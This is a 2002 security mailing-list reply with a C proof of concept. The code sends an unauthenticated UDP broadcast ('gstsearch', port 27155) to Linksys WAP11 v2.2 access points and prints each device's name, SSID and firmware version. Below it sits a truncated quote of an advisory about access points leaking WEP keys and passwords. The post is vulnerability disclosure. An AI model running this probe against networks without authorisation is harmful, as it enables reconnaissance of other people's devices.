 
From: Thomas Sarlandie (sarfata_at_altern.org)
Date: Tue Nov 05 2002 - 08:24:07 CST


    Hi,

    Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
    returns the AP's name,
    SSID and firmware version. Except for the firmware version, this is not
    private information.

    Quickly patched proof of concept :

    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    /*
     * Byte layout this program overlays on the datagram it receives after
     * sending the "gstsearch" request. The struct is packed so that member
     * offsets equal byte offsets in the reply (117 bytes in total).
     *
     * The layout is presumably what the author observed on a WAP11 v2.2;
     * nothing here guarantees that a device NUL-terminates any field, so
     * readers must bound every access by the field width.
     */
    typedef struct __attribute__ ((packed)) {
      char type[28];      /* offset   0: printed as "Type" */
      char blank1[8];     /* offset  28: not interpreted by this program */
      char apname[32];    /* offset  36: printed as "Announced Name" */
      char firmware[6];   /* offset  68: printed as "Firmware version" */
      char blank2[11];    /* offset  74: not interpreted by this program */
      char ssid[32];      /* offset  85: printed as "SSID" */
    } answer;

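    /*
     * Print one fixed-width field of the reply as "<label> : <value>".
     *
     * The field comes straight off the network, so it is read for at most
     * `width` bytes (it may lack a NUL terminator) and every byte outside
     * printable ASCII is shown as '?' so a reply cannot inject terminal
     * control sequences into the operator's console.
     */
    static void print_field(const char *label, const char *field, size_t width)
    {
        printf("%s : ", label);
        for (size_t i = 0; i < width && field[i] != '\0'; i++) {
            unsigned char c = (unsigned char)field[i];
            putchar((c >= 0x20 && c < 0x7f) ? c : '?');
        }
        putchar('\n');
    }

    /*
     * Broadcasts the 9-byte "gstsearch" request to UDP port 27155 and prints
     * the type, announced name, firmware version and SSID fields of the first
     * datagram read back.
     *
     * The request carries no credential, so any host on the broadcast domain
     * can obtain the same fields from a device that answers it; filtering
     * UDP port 27155 towards access points is the obvious containment.
     *
     * Returns 0 after printing a reply; exits/returns 1 when the socket
     * cannot be created or configured, or when sending or reading fails.
     */
    int main(void)
    {
        /* Zero-filled so a reply shorter than `answer` leaves empty fields
         * instead of exposing uninitialised stack bytes. */
        char rcvbuffer[1024] = {0};
        struct sockaddr_in sin = {0};
        const answer *ans = (const answer *)rcvbuffer;
        int sd;
        int val = 1;
        ssize_t ret;

        sin.sin_family = AF_INET;
        /* Same address as "255.255.255.255", without going through
         * inet_addr(), whose error value is indistinguishable from it. */
        sin.sin_addr.s_addr = htonl(INADDR_BROADCAST);
        sin.sin_port = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0) {
            perror("socket");
            exit(1);    /* the original fell through and used the bad descriptor */
        }

        /* Sending to the broadcast address requires SO_BROADCAST. */
        if (setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val)) < 0) {
            perror("setsockopt");
            close(sd);
            exit(1);
        }

        ret = sendto(sd, "gstsearch", 9, 0,
                     (const struct sockaddr *)&sin, sizeof(sin));
        if (ret < 0) {
            perror("sendto");
            close(sd);
            exit(1);
        }

        /* Blocks until one datagram arrives; only the first reply is shown. */
        ret = read(sd, rcvbuffer, sizeof(rcvbuffer));
        if (ret < 0) {
            perror("read");
            close(sd);
            return 1;
        }
        if ((size_t)ret < sizeof(answer)) {
            fprintf(stderr,
                    "short reply (%ld of %lu bytes); missing fields are shown empty\n",
                    (long)ret, (unsigned long)sizeof(answer));
        }

        print_field("Type", ans->type, sizeof(ans->type));
        print_field("Announced Name", ans->apname, sizeof(ans->apname));
        print_field("Firmware version", ans->firmware, sizeof(ans->firmware));
        print_field("SSID", ans->ssid, sizeof(ans->ssid));

        close(sd);
        return 0;
    }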

    thomas

    >KHAMSIN Security News
    >KSN Reference: 2002-11-01 0001 ULO
    >---------------------------------------------------------------------------
    >
    >Title
    >-----
    > Accesspoints disclose wep keys, password and mac filter
    >
    >Date
    >----
    > 2002-11-01
    >
    >
    >
    >
    >